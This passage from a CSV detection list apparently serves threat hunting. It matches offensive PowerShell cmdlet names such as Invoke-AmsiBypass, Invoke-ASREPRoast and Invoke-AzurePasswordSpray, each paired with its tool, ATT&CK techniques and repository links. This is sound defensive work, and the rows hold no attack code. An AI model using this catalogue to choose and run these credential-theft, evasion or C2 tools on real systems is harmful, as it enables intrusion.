- TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Invoke-ACLScanner * -Name *",".{0,1000}Invoke\-ACLScanner\s.{0,1000}\s\-Name\s.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*invoke-aclscanner*",".{0,1000}invoke\-aclscanner.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-ACLScanner*",".{0,1000}Invoke\-ACLScanner.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-ADCSTemplateRecon*",".{0,1000}Invoke\-ADCSTemplateRecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-Adeleginator*",".{0,1000}Invoke\-Adeleginator.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*Invoke-ADSBackdoor*",".{0,1000}Invoke\-ADSBackdoor.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*Invoke-ADSBackdoor*",".{0,1000}Invoke\-ADSBackdoor.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" 
"*Invoke-ADSBackdoor*",".{0,1000}Invoke\-ADSBackdoor.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-ADSBackdoor*",".{0,1000}Invoke\-ADSBackdoor.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-ADSBackdoor.json*",".{0,1000}Invoke\-ADSBackdoor\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-AirstrikeAttackCheck*",".{0,1000}Invoke\-AirstrikeAttackCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - 
TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-AllAccessChecks*",".{0,1000}Invoke\-AllAccessChecks.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AllChecks*",".{0,1000}Invoke\-AllChecks.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Check for vulnerable programs and configs","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-AmsiBypass*",".{0,1000}Invoke\-AmsiBypass.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Invoke-AmsiBypass*",".{0,1000}Invoke\-AmsiBypass.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-AmsiBypass*",".{0,1000}Invoke\-AmsiBypass.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-APIConnectionHijack.ps1*",".{0,1000}Invoke\-APIConnectionHijack\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Invoke-ApplicationsOnStartupCheck*",".{0,1000}Invoke\-ApplicationsOnStartupCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-ApplicationsOnStartupCheck*",".{0,1000}Invoke\-ApplicationsOnStartupCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-ARPScan*",".{0,1000}Invoke\-ARPScan.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ARPScan.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*invoke-arpscan*",".{0,1000}invoke\-arpscan.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation 
and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-ARPScan.ps1*",".{0,1000}Invoke\-ARPScan\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1077","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - 
APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ASREPRoast*",".{0,1000}Invoke\-ASREPRoast.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","187","55","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" "*InvokeAssembly.x64.dll*",".{0,1000}InvokeAssembly\.x64\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Invoke-AutoKerberoast*",".{0,1000}Invoke\-AutoKerberoast.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*Invoke-AutoOAuthFlow*",".{0,1000}Invoke\-AutoOAuthFlow.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Automates the OAuth flow completion to obtain access and refresh keys when a user grants consent to an app 
registration","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-AutoTokenRefresh*access_token.txt*",".{0,1000}Invoke\-AutoTokenRefresh.{0,1000}access_token\.txt.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-AzElevatedAccessToggle*",".{0,1000}Invoke\-AzElevatedAccessToggle.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Invoke-AzRESTBastionShareableLink*",".{0,1000}Invoke\-AzRESTBastionShareableLink.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Invoke-AzureEnum.ps1*",".{0,1000}Invoke\-AzureEnum\.ps1.{0,1000}","offensive_tool_keyword","Invoke-AzureEnum","This cmdlet is used to perform users enumeration against Azure","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzureEnum.ps1","1","1","N/A","N/A","5","460","88","2023-12-08T15:50:39Z","2019-11-20T22:07:50Z" "*Invoke-AzurePasswordSpray*",".{0,1000}Invoke\-AzurePasswordSpray.{0,1000}","offensive_tool_keyword","Invoke-AzurePasswordSpray","This cmdlet is used to perform a password spray attack against Azure accounts using legacy Basic 
Authentication","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzurePasswordSpray.ps1","1","1","N/A","N/A","5","460","88","2023-12-08T15:50:39Z","2019-11-20T22:07:50Z" "*Invoke-AzureRmVMBulkCMD.ps1*",".{0,1000}Invoke\-AzureRmVMBulkCMD\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Invoke-AzVMBulkCMD.ps1*",".{0,1000}Invoke\-AzVMBulkCMD\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Invoke-BackdoorLNK*",".{0,1000}Invoke\-BackdoorLNK.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BackdoorLNK.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-BackdoorLNK*",".{0,1000}Invoke\-BackdoorLNK.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1115","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-BadPotato*",".{0,1000}Invoke\-BadPotato.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-BadZure*",".{0,1000}Invoke\-BadZure.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - 
TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","350","20","2023-12-04T16:14:07Z","2023-05-05T04:52:21Z" "*Invoke-BetterSafetyKatz*",".{0,1000}Invoke\-BetterSafetyKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-BetterXencrypt*",".{0,1000}Invoke\-BetterXencrypt.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*Invoke-Binary *.exe*",".{0,1000}Invoke\-Binary\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*Invoke-BitlockerCheck*",".{0,1000}Invoke\-BitlockerCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-BlockETW*",".{0,1000}Invoke\-BlockETW.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-BlockETW*",".{0,1000}Invoke\-BlockETW.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*InvokeBloodHound*",".{0,1000}InvokeBloodHound.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","0","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" "*Invoke-BloodHound*",".{0,1000}Invoke\-BloodHound.{0,1000}","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*invoke-bloodhound*",".{0,1000}invoke\-bloodhound.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-BloodHound*",".{0,1000}Invoke\-BloodHound.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*Invoke-Bloodhound.ps1*",".{0,1000}Invoke\-Bloodhound\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*Invoke-Bof *",".{0,1000}Invoke\-Bof\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 